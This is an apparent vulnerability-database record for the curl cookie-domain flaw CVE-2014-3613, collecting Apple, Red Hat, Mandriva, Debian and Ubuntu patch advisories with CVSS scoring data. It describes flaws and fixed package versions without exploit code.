libxml2 Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: A memory corruption issue existed in parsing of XML files. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3807 : Apple
libxpc Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in handling of malformed XPC messages. This issue was improved through improved bounds checking. CVE-ID CVE-2015-3795 : Mathew Rowley
mail_cmds Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary shell commands Description: A validation issue existed in the mailx parsing of email addresses. This was addressed by improved sanitization. CVE-ID CVE-2014-7844
Notification Center OSX Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to access all notifications previously displayed to users Description: An issue existed in Notification Center, which did not properly delete user notifications. This issue was addressed by correctly deleting notifications dismissed by users. CVE-ID CVE-2015-3764 : Jonathan Zdziarski
ntfs Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in NTFS. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze Networks
OpenSSH Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Remote attackers may be able to circumvent a time delay for failed login attempts and conduct brute-force attacks Description: An issue existed when processing keyboard-interactive devices. This issue was addressed through improved authentication request validation. CVE-ID CVE-2015-5600
OpenSSL Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in OpenSSL versions prior to 0.9.8zg, the most serious of which may allow a remote attacker to cause a denial of service. Description: Multiple vulnerabilities existed in OpenSSL versions prior to 0.9.8zg. These were addressed by updating OpenSSL to version 0.9.8zg. CVE-ID CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792
perl Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted regular expression may lead to disclosure of unexpected application termination or arbitrary code execution Description: An integer underflow issue existed in the way Perl parsed regular expressions. This issue was addressed through improved memory handling. CVE-ID CVE-2013-7422
PostgreSQL Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: An attacker may be able to cause unexpected application termination or gain access to data without proper authentication Description: Multiple issues existed in PostgreSQL 9.2.4. These issues were addressed by updating PostgreSQL to 9.2.13. CVE-ID CVE-2014-0067 CVE-2014-8161 CVE-2015-0241 CVE-2015-0242 CVE-2015-0243 CVE-2015-0244
python Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in Python 2.7.6, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in Python versions prior to 2.7.6. These were addressed by updating Python to version 2.7.10. CVE-ID CVE-2013-7040 CVE-2013-7338 CVE-2014-1912 CVE-2014-7185 CVE-2014-9365
QL Office Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted Office document may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in parsing of Office documents. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5773 : Apple
QL Office Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted XML file may lead to disclosure of user information Description: An external entity reference issue existed in XML file parsing. This issue was addressed through improved parsing. CVE-ID CVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.
Quartz Composer Framework Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted QuickTime file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in parsing of QuickTime files. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5771 : Apple
Quick Look Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Searching for a previously viewed website may launch the web browser and render that website Description: An issue existed where QuickLook had the capability to execute JavaScript. The issue was addressed by disallowing execution of JavaScript. CVE-ID CVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole
QuickTime 7 Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in QuickTime. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3772 CVE-2015-3779 CVE-2015-5753 : Apple CVE-2015-5779 : Apple
QuickTime 7 Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in QuickTime. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3765 : Joe Burnett of Audio Poison CVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos CVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos CVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos CVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos CVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos CVE-2015-5751 : WalkerFuz
SceneKit Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Viewing a maliciously crafted Collada file may lead to arbitrary code execution Description: A heap buffer overflow existed in SceneKit's handling of Collada files. This issue was addressed through improved input validation. CVE-ID CVE-2015-5772 : Apple
SceneKit Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in SceneKit. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3783 : Haris Andrianakis of Google Security Team
Security Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A standard user may be able to gain access to admin privileges without proper authentication Description: An issue existed in handling of user authentication. This issue was addressed through improved authentication checks. CVE-ID CVE-2015-3775 : [Eldon Ahrold]
SMBClient Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the SMB client. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3773 : Ilja van Sprundel
Speech UI Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted unicode string with speech alerts enabled may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in handling of Unicode strings. This issue was addressed by improved memory handling. CVE-ID CVE-2015-3794 : Adam Greenbaum of Refinitive
sudo Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in sudo versions prior to 1.7.10p9, the most serious of which may allow an attacker access to arbitrary files Description: Multiple vulnerabilities existed in sudo versions prior to 1.7.10p9. These were addressed by updating sudo to version 1.7.10p9. CVE-ID CVE-2013-1775 CVE-2013-1776 CVE-2013-2776 CVE-2013-2777 CVE-2014-0106 CVE-2014-9680
tcpdump Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most serious of which may allow a remote attacker to cause a denial of service. Description: Multiple vulnerabilities existed in tcpdump versions prior to 4.7.3. These were addressed by updating tcpdump to version 4.7.3. CVE-ID CVE-2014-8767 CVE-2014-8769 CVE-2014-9140
Text Formats Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted text file may lead to disclosure of user information Description: An XML external entity reference issue existed with TextEdit parsing. This issue was addressed through improved parsing. CVE-ID CVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team
udf Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted DMG file may lead to an unexpected application termination or arbitrary code execution with system privileges Description: A memory corruption issue existed in parsing of malformed DMG images. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3767 : beist of grayhash
OS X Yosemite v10.10.5 includes the security content of Safari 8.0.8: https://support.apple.com/en-us/HT205033
OS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
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===================================================================== Red Hat Security Advisory
Synopsis: Moderate: curl security, bug fix, and enhancement update Advisory ID: RHSA-2015:2159-06 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2159.html Issue date: 2015-11-19 CVE Names: CVE-2014-3613 CVE-2014-3707 CVE-2014-8150 CVE-2015-3143 CVE-2015-3148 =====================================================================
- Summary:
Updated curl packages that fix multiple security issues, several bugs, and add two enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64
- Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
It was found that the libcurl library did not correctly handle partial literal IP addresses when parsing received HTTP cookies. An attacker able to trick a user into connecting to a malicious server could use this flaw to set the user's cookie to a crafted domain, making other cookie-related issues easier to exploit. (CVE-2014-3613)
A flaw was found in the way the libcurl library performed the duplication of connection handles. If an application set the CURLOPT_COPYPOSTFIELDS option for a handle, using the handle's duplicate could cause the application to crash or disclose a portion of its memory. (CVE-2014-3707)
It was discovered that the libcurl library failed to properly handle URLs with embedded end-of-line characters. An attacker able to make an application using libcurl access a specially crafted URL via an HTTP proxy could use this flaw to inject additional headers to the request or construct additional requests. (CVE-2014-8150)
It was discovered that libcurl implemented aspects of the NTLM and Negotatiate authentication incorrectly. If an application uses libcurl and the affected mechanisms in a specifc way, certain requests to a previously NTLM-authenticated server could appears as sent by the wrong authenticated user. Additionally, the initial set of credentials for HTTP Negotiate-authenticated requests could be reused in subsequent requests, although a different set of credentials was specified. (CVE-2015-3143, CVE-2015-3148)
Red Hat would like to thank the cURL project for reporting these issues.
Bug fixes:
-
An out-of-protocol fallback to SSL 3.0 was available with libcurl. Attackers could abuse the fallback to force downgrade of the SSL version. The fallback has been removed from libcurl. Users requiring this functionality can explicitly enable SSL 3.0 through the libcurl API. (BZ#1154060)
-
TLS 1.1 and TLS 1.2 are no longer disabled by default in libcurl. You can explicitly disable them through the libcurl API. (BZ#1170339)
-
FTP operations such as downloading files took a significantly long time to complete. Now, the FTP implementation in libcurl correctly sets blocking direction and estimated timeout for connections, resulting in faster FTP transfers. (BZ#1218272)
Enhancements:
-
With the updated packages, it is possible to explicitly enable or disable new Advanced Encryption Standard (AES) cipher suites to be used for the TLS protocol. (BZ#1066065)
-
The libcurl library did not implement a non-blocking SSL handshake, which negatively affected performance of applications based on the libcurl multi API. The non-blocking SSL handshake has been implemented in libcurl, and the libcurl multi API now immediately returns the control back to the application whenever it cannot read or write data from or to the underlying network socket. (BZ#1091429)
-
The libcurl library used an unnecessarily long blocking delay for actions with no active file descriptors, even for short operations. Some actions, such as resolving a host name using /etc/hosts, took a long time to complete. The blocking code in libcurl has been modified so that the initial delay is short and gradually increases until an event occurs. (BZ#1130239)
All curl users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1130239 - Difference in curl performance between RHEL6 and RHEL7 1136154 - CVE-2014-3613 curl: incorrect handling of IP addresses in cookie domain 1154060 - curl: Disable out-of-protocol fallback to SSL 3.0 1154941 - CVE-2014-3707 curl: incorrect handle duplication after COPYPOSTFIELDS 1161182 - Response headers added by proxy servers missing in CURLINFO_HEADER_SIZE 1166264 - NTLM: ignore CURLOPT_FORBID_REUSE during NTLM HTTP auth [RHEL-7] 1170339 - use the default min/max TLS version provided by NSS 1178692 - CVE-2014-8150 curl: URL request injection vulnerability in parseurlandfillconn() 1213306 - CVE-2015-3143 curl: re-using authenticated connection when unauthenticated 1213351 - CVE-2015-3148 curl: Negotiate not treated as connection-oriented 1218272 - Performance problem with libcurl and FTP on RHEL7.X
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: curl-7.29.0-25.el7.src.rpm
x86_64: curl-7.29.0-25.el7.x86_64.rpm curl-debuginfo-7.29.0-25.el7.i686.rpm curl-debuginfo-7.29.0-25.el7.x86_64.rpm libcurl-7.29.0-25.el7.i686.rpm libcurl-7.29.0-25.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: curl-debuginfo-7.29.0-25.el7.i686.rpm curl-debuginfo-7.29.0-25.el7.x86_64.rpm libcurl-devel-7.29.0-25.el7.i686.rpm libcurl-devel-7.29.0-25.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: curl-7.29.0-25.el7.src.rpm
x86_64: curl-7.29.0-25.el7.x86_64.rpm curl-debuginfo-7.29.0-25.el7.i686.rpm curl-debuginfo-7.29.0-25.el7.x86_64.rpm libcurl-7.29.0-25.el7.i686.rpm libcurl-7.29.0-25.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: curl-debuginfo-7.29.0-25.el7.i686.rpm curl-debuginfo-7.29.0-25.el7.x86_64.rpm libcurl-devel-7.29.0-25.el7.i686.rpm libcurl-devel-7.29.0-25.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: curl-7.29.0-25.el7.src.rpm
aarch64: curl-7.29.0-25.el7.aarch64.rpm curl-debuginfo-7.29.0-25.el7.aarch64.rpm libcurl-7.29.0-25.el7.aarch64.rpm libcurl-devel-7.29.0-25.el7.aarch64.rpm
ppc64: curl-7.29.0-25.el7.ppc64.rpm curl-debuginfo-7.29.0-25.el7.ppc.rpm curl-debuginfo-7.29.0-25.el7.ppc64.rpm libcurl-7.29.0-25.el7.ppc.rpm libcurl-7.29.0-25.el7.ppc64.rpm libcurl-devel-7.29.0-25.el7.ppc.rpm libcurl-devel-7.29.0-25.el7.ppc64.rpm
ppc64le: curl-7.29.0-25.el7.ppc64le.rpm curl-debuginfo-7.29.0-25.el7.ppc64le.rpm libcurl-7.29.0-25.el7.ppc64le.rpm libcurl-devel-7.29.0-25.el7.ppc64le.rpm
s390x: curl-7.29.0-25.el7.s390x.rpm curl-debuginfo-7.29.0-25.el7.s390.rpm curl-debuginfo-7.29.0-25.el7.s390x.rpm libcurl-7.29.0-25.el7.s390.rpm libcurl-7.29.0-25.el7.s390x.rpm libcurl-devel-7.29.0-25.el7.s390.rpm libcurl-devel-7.29.0-25.el7.s390x.rpm
x86_64: curl-7.29.0-25.el7.x86_64.rpm curl-debuginfo-7.29.0-25.el7.i686.rpm curl-debuginfo-7.29.0-25.el7.x86_64.rpm libcurl-7.29.0-25.el7.i686.rpm libcurl-7.29.0-25.el7.x86_64.rpm libcurl-devel-7.29.0-25.el7.i686.rpm libcurl-devel-7.29.0-25.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: curl-7.29.0-25.el7.src.rpm
x86_64: curl-7.29.0-25.el7.x86_64.rpm curl-debuginfo-7.29.0-25.el7.i686.rpm curl-debuginfo-7.29.0-25.el7.x86_64.rpm libcurl-7.29.0-25.el7.i686.rpm libcurl-7.29.0-25.el7.x86_64.rpm libcurl-devel-7.29.0-25.el7.i686.rpm libcurl-devel-7.29.0-25.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-3613 https://access.redhat.com/security/cve/CVE-2014-3707 https://access.redhat.com/security/cve/CVE-2014-8150 https://access.redhat.com/security/cve/CVE-2015-3143 https://access.redhat.com/security/cve/CVE-2015-3148 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
libcurl can in some circumstances re-use the wrong connection when asked to do transfers using other protocols than HTTP and FTP, causing a transfer that was initiated by an application to wrongfully re-use an existing connection to the same server that was authenticated using different credentials (CVE-2014-0138).
libcurl incorrectly validates wildcard SSL certificates containing literal IP addresses, so under certain conditions, it would allow and use a wildcard match specified in the CN field, allowing a malicious server to participate in a MITM attack or just fool users into believing that it is a legitimate site (CVE-2014-0139). For this problem to trigger, the client application must use the numerical IP address in the URL to access the site (CVE-2014-3613).
Symeon Paraschoudis discovered that the curl_easy_duphandle() function in cURL has a bug that can lead to libcurl eventually sending off sensitive data that was not intended for sending, while performing a HTTP POST operation. This bug requires CURLOPT_COPYPOSTFIELDS and curl_easy_duphandle() to be used in that order, and then the duplicate handle must be used to perform the HTTP POST. The curl command line tool is not affected by this problem as it does not use this sequence (CVE-2014-3707).
When libcurl sends a request to a server via a HTTP proxy, it copies the entire URL into the request and sends if off. If the given URL contains line feeds and carriage returns those will be sent along to the proxy too, which allows the program to for example send a separate HTTP request injected embedded in the URL (CVE-2014-8150).
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0015 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0139 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3613 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3620 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3707 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8150 http://advisories.mageia.org/MGASA-2014-0153.html http://advisories.mageia.org/MGASA-2014-0385.html http://advisories.mageia.org/MGASA-2014-0444.html http://advisories.mageia.org/MGASA-2015-0020.html
Updated Packages:
Mandriva Business Server 2/X86_64: 498d59be3a6a4ace215c0d98fb4abede mbs2/x86_64/curl-7.34.0-3.1.mbs2.x86_64.rpm 75a821b73a75ca34f1747a0f7479267f mbs2/x86_64/curl-examples-7.34.0-3.1.mbs2.noarch.rpm f5d3aad5f0fd9db68b87c648aaabbb4a mbs2/x86_64/lib64curl4-7.34.0-3.1.mbs2.x86_64.rpm 4f356a2c97f9f64124b4e8ebe307826a mbs2/x86_64/lib64curl-devel-7.34.0-3.1.mbs2.x86_64.rpm d010a357d76a8eb967c7c52f92fb35ae mbs2/SRPMS/curl-7.34.0-3.1.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
For the stable distribution (wheezy), these problems have been fixed in version 7.26.0-1+wheezy10.
For the testing distribution (jessie), these problems have been fixed in version 7.38.0-1.
For the unstable distribution (sid), these problems have been fixed in version 7.38.0-1.
We recommend that you upgrade your curl packages
Show details on source website{
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"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-3613",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-71553",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-3613",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-3613",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201410-1276",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-71553",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2014-3613",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71553"
},
{
"db": "VULMON",
"id": "CVE-2014-3613"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1276"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005511"
},
{
"db": "NVD",
"id": "CVE-2014-3613"
}
]
},
"description": {
"_id": null,
"data": "cURL and libcurl before 7.38.0 does not properly handle IP addresses in cookie domain names, which allows remote attackers to set cookies for or send arbitrary cookies to certain sites, as demonstrated by a site at 192.168.0.1 setting cookies for a site at 127.168.0.1. cURL/libcURL is prone to a remote security-bypass vulnerability. \nAn attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. \ncURL/libcURL 7.1 through 7.37.1 are vulnerable. Both Haxx curl and libcurl are products of the Swedish company Haxx. libcurl is a free, open source client-side URL transfer library. ============================================================================\nUbuntu Security Notice USN-2346-1\nSeptember 15, 2014\n\ncurl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in curl. (CVE-2014-3620)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libcurl3 7.35.0-1ubuntu2.1\n libcurl3-gnutls 7.35.0-1ubuntu2.1\n libcurl3-nss 7.35.0-1ubuntu2.1\n\nUbuntu 12.04 LTS:\n libcurl3 7.22.0-3ubuntu4.10\n libcurl3-gnutls 7.22.0-3ubuntu4.10\n libcurl3-nss 7.22.0-3ubuntu4.10\n\nUbuntu 10.04 LTS:\n libcurl3 7.19.7-1ubuntu1.9\n libcurl3-gnutls 7.19.7-1ubuntu1.9\n\nIn general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update\n2015-006\n\nOS X Yosemite v10.10.5 and Security Update 2015-006 is now available\nand addresses the following:\n\napache\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Multiple vulnerabilities existed in Apache 2.4.16, the most\nserious of which may allow a remote attacker to cause a denial of\nservice. \nDescription: Multiple vulnerabilities existed in Apache versions\nprior to 2.4.16. These were addressed by updating Apache to version\n2.4.16. \nCVE-ID\nCVE-2014-3581\nCVE-2014-3583\nCVE-2014-8109\nCVE-2015-0228\nCVE-2015-0253\nCVE-2015-3183\nCVE-2015-3185\n\napache_mod_php\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Multiple vulnerabilities existed in PHP 5.5.20, the most\nserious of which may lead to arbitrary code execution. \nDescription: Multiple vulnerabilities existed in PHP versions prior\nto 5.5.20. These were addressed by updating Apache to version 5.5.27. \nCVE-ID\nCVE-2015-2783\nCVE-2015-2787\nCVE-2015-3307\nCVE-2015-3329\nCVE-2015-3330\nCVE-2015-4021\nCVE-2015-4022\nCVE-2015-4024\nCVE-2015-4025\nCVE-2015-4026\nCVE-2015-4147\nCVE-2015-4148\n\nApple ID OD Plug-in\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able change the password of a\nlocal user\nDescription: In some circumstances, a state management issue existed\nin password authentication. The issue was addressed through improved\nstate management. \nCVE-ID\nCVE-2015-3799 : an anonymous researcher working with HP\u0027s Zero Day\nInitiative\n\nAppleGraphicsControl\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in AppleGraphicsControl which could\nhave led to the disclosure of kernel memory layout. This issue was\naddressed through improved bounds checking. \nCVE-ID\nCVE-2015-5768 : JieTao Yang of KeenTeam\n\nBluetooth\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A memory corruption issue existed in\nIOBluetoothHCIController. This issue was addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-3779 : Teddy Reed of Facebook Security\n\nBluetooth\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: A memory management issue could have led to the\ndisclosure of kernel memory layout. This issue was addressed with\nimproved memory management. \nCVE-ID\nCVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nBluetooth\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious app may be able to access notifications from\nother iCloud devices\nDescription: An issue existed where a malicious app could access a\nBluetooth-paired Mac or iOS device\u0027s Notification Center\nnotifications via the Apple Notification Center Service. The issue\naffected devices using Handoff and logged into the same iCloud\naccount. This issue was resolved by revoking access to the Apple\nNotification Center Service. \nCVE-ID\nCVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security\nLab (Indiana University), Tongxin Li (Peking University), XiaoFeng\nWang (Indiana University)\n\nBluetooth\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: An attacker with privileged network position may be able to\nperform denial of service attack using malformed Bluetooth packets\nDescription: An input validation issue existed in parsing of\nBluetooth ACL packets. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2015-3787 : Trend Micro\n\nBluetooth\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: Multiple buffer overflow issues existed in blued\u0027s\nhandling of XPC messages. These issues were addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2015-3777 : mitp0sh of [PDX]\n\nbootp\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious Wi-Fi network may be able to determine networks\na device has previously accessed\nDescription: Upon connecting to a Wi-Fi network, iOS may have\nbroadcast MAC addresses of previously accessed networks via the DNAv4\nprotocol. This issue was addressed through disabling DNAv4 on\nunencrypted Wi-Fi networks. \nCVE-ID\nCVE-2015-3778 : Piers O\u0027Hanlon of Oxford Internet Institute,\nUniversity of Oxford (on the EPSRC Being There project)\n\nCloudKit\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to access the iCloud\nuser record of a previously signed in user\nDescription: A state inconsistency existed in CloudKit when signing\nout users. This issue was addressed through improved state handling. \nCVE-ID\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\n\nCoreMedia Playback\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Viewing a maliciously crafted movie file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Memory corruption issues existed in CoreMedia Playback. \nThese were addressed through improved memory handling. \nCVE-ID\nCVE-2015-5777 : Apple\nCVE-2015-5778 : Apple\n\nCoreText\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\n\nCoreText\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team\n\ncurl\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Multiple vulnerabilities in cURL and libcurl prior to\n7.38.0, one of which may allow remote attackers to bypass the Same\nOrigin Policy. \nDescription: Multiple vulnerabilities existed in cURL and libcurl\nprior to 7.38.0. These issues were addressed by updating cURL to\nversion 7.43.0. \nCVE-ID\nCVE-2014-3613\nCVE-2014-3620\nCVE-2014-3707\nCVE-2014-8150\nCVE-2014-8151\nCVE-2015-3143\nCVE-2015-3144\nCVE-2015-3145\nCVE-2015-3148\nCVE-2015-3153\n\nData Detectors Engine\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Processing a sequence of unicode characters can lead to an\nunexpected application termination or arbitrary code execution\nDescription: Memory corruption issues existed in processing of\nUnicode characters. These issues were addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)\n\nDate \u0026 Time pref pane\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Applications that rely on system time may have unexpected\nbehavior\nDescription: An authorization issue existed when modifying the\nsystem date and time preferences. This issue was addressed with\nadditional authorization checks. \nCVE-ID\nCVE-2015-3757 : Mark S C Smith\n\nDictionary Application\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: An attacker with a privileged network position may be able\nto intercept users\u0027 Dictionary 